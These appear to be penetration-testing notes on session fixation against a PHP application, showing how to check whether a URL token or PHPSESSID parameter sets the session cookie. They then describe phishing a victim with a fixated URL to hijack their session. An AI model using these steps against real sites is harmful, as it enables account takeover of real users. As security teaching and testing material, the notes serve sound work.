DISCOVERY

#step 1:
root@oco:~$ BROWSER > {targetSite:port}/?redirect_uri=/complete.html&token=cjrk6aa7ricu100dm8fa2mrkhe > F12 > Storage > Cookies
 {targetSite:port}
 Name: PHPSESSID
 Value: cjrk6aa7ricu100dm8fa2mrkhe
 * url parameter added once the site is visited {targetSite:port}/?redirect_uri=/complete.html&token=cjrk6aa7ricu100dm8fa2mrkhe
    - the application uses a session cookie named PHPSESSID and that the cookie's value is the same as the token parameter's value on the URL
       - If any value or a valid session identifier specified in the token parameter on the URL is propagated to the PHPSESSID cookie's value, then there may be a session fixation vulnerability.

#step 2: exploitation
root@oco:~$ BROWSER > New Private Window > http://{targetSite:port}/?redirect_uri=/complete.html&token=attackerControlledCookie > F12 > Storage > Cookies
 Name: PHPSESSID
 Value: attackerControlledCookie
 
 * if the token={arbitraryValue} from the URL is propagated to the PHPSESSID in the Cookie, then the vulnerability is validated
 
#step 3: send a URL similar to the above to a victim (phishing). 
#If the victim logs into the application, the attacker could easily hijack the victim's 
#session since the session identifier is already known (the attacker fixated it).

 

#put the session identifier name and value in the URL and then refreshing
root@oco:~$ BROWSER > http://insecure.exampleapp.com/login?PHPSESSID=AttackerSpecifiedCookieValue

#step 2: see if the specified cookie value is propagated to the application
root@oco:~$ BROWSER > New Private Window > http://{targetSite:port}/login?PHPSESSID=AttackerSpecifiedCookieValue > F12 > Storage > Cookies
 Name: PHPSESSID
 Value: AttackerSpecifiedCookieValue